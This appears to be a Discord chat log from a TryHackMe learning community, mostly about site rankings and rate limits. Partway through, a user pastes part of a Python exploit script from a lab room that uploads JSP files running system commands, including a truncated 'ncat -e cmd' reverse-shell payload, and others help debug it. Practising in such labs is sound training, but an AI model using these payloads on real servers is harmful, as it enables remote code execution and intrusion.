tawdry crescent
#

metasploit?

#

I've did like Pre Security and Cyber Security 101 and yeah payloads do screw stuff up sometimes

#

I am at top 7% in THM, can anybody tell me if that is just a "good" thing or a "great" thing? ๐Ÿค”

rapid merlin
distant robin
#

This room lol

tawdry crescent
distant robin
#

no

tawdry crescent
#

ok haven't done that yet, I am currently in the Web-fundamentals learning path

distant robin
#

It keeps telling me file not found and I am not sure what I am doing wrong

tawdry crescent
tawdry crescent
distant robin
dark wolf
#

and has been here for months

#

soooo

tawdry crescent
#

ok ma bad, I am new here all i knew was 0 day is the top G

dark wolf
#

There are close to 2 miillion people ranked

rapid merlin
tawdry crescent
#

i am in the 119000s

distant robin
#

What's funny, @tawdry crescent ?

dark wolf
#

about 5k are active

#

90% of the users try it for 2 days or a week and quit

tawdry crescent
tawdry crescent
timid prism
distant robin
distant robin
tawdry crescent
#

ok so apparently i have like 79 or 80 rooms done

timid prism
#

Hehe

narrow yew
#

There are heeps of users that never log in again

tawdry crescent
rapid merlin
#

And email used

dark wolf
#

I was top 1% after less than 90 dys

narrow yew
#

Then they put on rate limit

#

and you was not ๐Ÿ˜„

distant robin
#

it says I'm top 10%, whatever that means

timid prism
#

Now the users incresed so 1% is easier

dark wolf
#

what rate limit?

narrow yew
#

They have it now

dark wolf
#

i haven't been stopped by it yet

narrow yew
#

if you awnser too fast

#

It tells you "going a bit fast"

timid prism
#

Ye

narrow yew
#

It is a new feature

timid prism
#

Why was it. Needed

distant robin
#

fature - new word from Maths

distant robin
narrow yew
#

So many

#

You see users that have been around a week with 50k points

narrow yew
distant robin
#

Ok I'm going back to look at that file. Although I do have a question regarding the payload

tawdry crescent
#

sending it in...

#

how is it?

whole rapids
tawdry crescent
#

Thanks

narrow yew
tawdry crescent
#

Noice

narrow yew
#

I never look at this

#

I have been on 45 days for two weeks

whole rapids
narrow yew
#

Because I get in to a freeze every other day and solving it and nothing the day after. No progress

distant robin
#

Part of the payload code:

    protocols = ['http://', 'https://']
    found_vulnerabilities = False

    for protocol in protocols:
***        target_url = urljoin(protocol + url.lstrip('http://').lstrip('https://'), "/")
        print(f"Checking {10.10.77.42}...")***

        target_url_put1 = urljoin(target_url, "/aa.Jsp")
        target_url_put2 = urljoin(target_url, "/bb.Jsp")
        target_url_get1 = urljoin(target_url, "/aa.jsp")
        target_url_get2 = urljoin(target_url, "/bb.jsp")

        headers1 = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2>
            "Content-Type": "application/json"
        }

        headers2 = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2>
        }
        payload_put = "aa<% Runtime.getRuntime().exec(\"calc.exe\");%>"
        payload_put = "<%@ page import=\"java.io.*\" %><% Runtime.getRuntime().exec(\"cmd /c start ncat -e cmd.>```

My question is about the text in italics - is it the target machine or the attack machine's IP?
narrow yew
#

IP looks like target

tawdry crescent
#

it says target_url so it must be it

distant robin
#

Ok well I tried to execute it using python3 as per instructions on the page and it says I cannot open the file. I tried chmod x+ the file name but says the same thing

#

It's on the attack box

tawdry crescent
#

what is the error message?

narrow yew
#

Did you change the IP?

sleek hare
distant robin
tawdry crescent
distant robin
sleek hare
#

I care about challanges

narrow yew
#

see it looks for another py

tawdry crescent
#

Well I am aiming for PT1 so that's why i do carre about it

whole rapids
marsh lark
#

I guess I'll do it too

tawdry crescent
narrow yew
#

Winner winner chicken dinner

whole rapids
distant robin
whole rapids
tawdry crescent
marsh lark
tawdry crescent
#

๐Ÿ˜

narrow yew
#

Kali will not allow it

distant robin
twin ridgeBOT
#

Gave +1 Rep to @whole rapids (current: #962 - 6)

tawdry crescent
narrow yew
tawdry crescent
#

Damn, I need more then

narrow yew
#

Be nice twice.

#

And it will be all good

distant robin
#

there's another error after I fixed it

distant robin
narrow yew
#

it says URL

#

so room might want you to create a hosts file entry or add http://

#

target_url could be a referennce also in the code

distant robin
#

Ok thanks @narrow yew

twin ridgeBOT
#

Gave +1 Rep to @narrow yew (current: #352 - 22)

narrow yew
#

why does it say chiecking IP and IP is not added anywhere else?